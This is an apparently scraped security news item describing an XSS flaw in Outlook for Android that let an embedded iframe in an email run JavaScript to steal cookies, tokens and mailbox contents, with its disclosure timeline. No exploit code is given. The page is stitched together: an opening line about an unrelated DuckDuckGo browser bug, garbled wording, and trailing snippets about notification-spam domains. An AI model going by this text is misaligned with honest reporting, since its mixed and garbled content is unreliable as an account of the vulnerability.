Independent researcher Dhiraj Mishra discovered a vulnerability in Android version of DuckDuckGo browser (version 5.26.0)…
One of the experts who discovered the problem was F5 Networks specialist Bryan Appleby. Now he has published detailed information about the vulnerability and working on PoC-exploit for her.
Researcher said that he discovered a bug by chance when sharing JavaScript code with his friends via email. In fact, the problem was related to mail server parses HTML in the letter, and allows the attacker to embed the iframe into the message that receives a victim.
Running JavaScript inside such an iframe allowed an attacker to read the content associated with the application in the context of the Outlook user logged in (that is, to steal cookies, tokens, and even contents of the mailbox).“The ability to embed an iframe into an email is already a vulnerability. Even worse, as the iframe was not affected by the block external images setting that prevents tracking pixels and web beacons. But if an attacker could gain the ability to run JavaScript in an email, there could be a much more dangerous attack vector”, – told Bryan Appleby.
As it turned out, Appleby told Microsoft about the bug back in December 2018, but the vulnerability was confirmed only in March 2019, after a specialist provided PoC-exploit to developers. He corrected the problem only this month, that is, more than six months later after its discovery.
Since Appleby was not the only expert who noticed dangerous XSS in Outlook, The Hacker News published a video demonstrating a vulnerability in action.
An independent security expert Gaurav Kumar, who also found a bug and reported it to Microsoft, provided the video.
Source: https://www.f5.com
News-bpudepi.today is a domain that tries to trick you into subscribing to its browser notifications…
Doguhtam.xyz is a site that tries to trick you into subscribing to its browser notifications…
News-xlixoti.com is a site that tries to force you into subscribing to its browser notifications…
Ducesousightion.com is a domain that tries to trick you into clik to its browser notifications…
News-xlabica.live is a domain that tries to trick you into clik to its browser notifications…
Mergechain.co.in is a site that tries to trick you into subscribing to its browser notifications…